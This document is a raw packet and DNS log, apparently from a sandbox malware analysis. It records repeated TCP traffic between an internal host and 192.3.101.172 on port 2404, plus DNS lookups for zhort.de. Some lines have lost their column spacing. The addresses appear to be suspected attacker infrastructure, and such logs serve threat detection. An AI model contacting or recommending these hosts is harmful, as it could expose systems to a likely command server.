Aug 28, 2024 22:29:43.017329931 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017364979 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017401934 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017410994 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017421007 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017431974 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017445087 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017467976 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017497063 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017508030 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017518044 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017543077 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017627954 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017637968 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017647028 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017657042 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017667055 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.017683029 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.017693043 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.018183947 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.018201113 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.019126892 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.019934893 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.019969940 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.019978046 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020653963 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020667076 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020677090 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020698071 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020711899 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020715952 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020725965 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020735979 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020747900 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020757914 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020869017 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020879030 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020889044 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020901918 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020917892 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020920038 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020929098 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020940065 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020941019 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020946980 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020951986 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.020966053 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.020981073 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.022519112 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022547960 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022558928 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022603989 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.022660017 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022670031 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022685051 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022695065 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022706032 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.022713900 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.022722960 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.022782087 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.057368994 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.057379961 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.057389021 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.057435989 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.332895041 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.332920074 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.332931995 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.332969904 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333072901 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333084106 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333092928 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333102942 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333113909 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333136082 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333252907 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333264112 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333273888 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333285093 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333296061 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333300114 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333307028 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333322048 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333337069 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333369970 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333379984 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333415031 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333508015 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333518028 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333527088 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333539009 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333549976 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333559990 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333566904 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333571911 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333583117 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333587885 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333633900 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333656073 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333666086 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333678007 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333697081 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333765030 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333775997 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333786964 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333796978 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333808899 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333817959 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333823919 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333827972 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333832979 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333834887 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333916903 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333928108 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333935976 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333937883 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333945990 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333956957 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333964109 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333967924 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.333971024 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.333991051 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334007978 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334017038 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334028006 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334033966 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.334038019 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334049940 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334049940 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.334072113 CEST   49174  2404   192.168.2.22   192.3.101.172
Aug 28, 2024 22:29:43.334127903 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334240913 CEST   2404   49174  192.3.101.172  192.168.2.22
Aug 28, 2024 22:29:43.334252119 CEST   2404   49174  192.3.101.172  192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334260941 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334270000 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334275007 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334280014 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334290981 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334299088 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334302902 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334310055 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334320068 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334323883 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334342003 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334388971 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334399939 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334408045 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334419966 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334430933 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334434032 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334440947 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334449053 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334451914 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334460974 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334471941 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334477901 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334482908 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334486961 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.334494114 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334503889 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334512949 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334518909 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334528923 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.334549904 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335033894 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335050106 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335058928 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335067987 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335078955 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335078955 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335089922 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335098982 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335108995 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335117102 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335123062 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335127115 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335133076 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335150003 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335158110 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335160017 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335174084 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335189104 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335192919 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335200071 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335208893 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335221052 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335226059 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335232019 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335242987 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335243940 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335253954 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335263968 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335274935 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335283995 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335287094 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335294962 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335304976 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335308075 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335314989 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335325003 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335330009 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335335016 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335345984 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335354090 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335361958 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335362911 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.335376978 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.335402012 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.336222887 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.337920904 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.337982893 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.337995052 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338032007 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338058949 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338069916 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338080883 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338093042 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338105917 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338131905 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338159084 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338170052 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338181973 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338195086 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338206053 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338217974 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338231087 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338232994 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338257074 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338346958 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338356018 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338367939 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338388920 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338408947 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338419914 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338432074 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338443041 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338454962 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338469982 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338494062 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338514090 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338567972 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338578939 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338604927 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338656902 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338669062 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338680029 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338691950 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338710070 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338720083 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338721991 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338736057 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338747025 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338749886 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338758945 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338771105 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338798046 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.338927031 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338937998 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338949919 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.338973999 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339011908 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339025021 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339035988 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339047909 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339051008 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339080095 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339169025 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339179993 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339191914 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339204073 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339215994 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339224100 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339227915 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339238882 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339250088 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339256048 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339262962 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339273930 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339274883 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339294910 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339303970 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339307070 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339318991 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339330912 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339334965 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339344978 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339345932 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339380980 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339601040 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339647055 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339662075 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339674950 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339689016 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339706898 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339756012 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339767933 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339778900 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339791059 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339823008 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339910030 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339930058 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339942932 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339955091 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339967966 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339973927 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339979887 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.339987993 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.339993000 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340004921 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340018034 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340018988 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.340034008 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.340046883 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340058088 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340069056 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340081930 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340087891 CEST491742404192.168.2.22192.3.101.172
                                                                              Aug 28, 2024 22:29:43.340095043 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340109110 CEST240449174192.3.101.172192.168.2.22
                                                                              Aug 28, 2024 22:29:43.340114117 CEST491742404192.168.2.22192.3.101.172
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 22:29:18.637056112 CEST | 192.168.2.22 | 8.8.8.8 | 0x90ed | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:20.788198948 CEST | 192.168.2.22 | 8.8.8.8 | 0x48fd | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:22.036560059 CEST | 192.168.2.22 | 8.8.8.8 | 0x6660 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
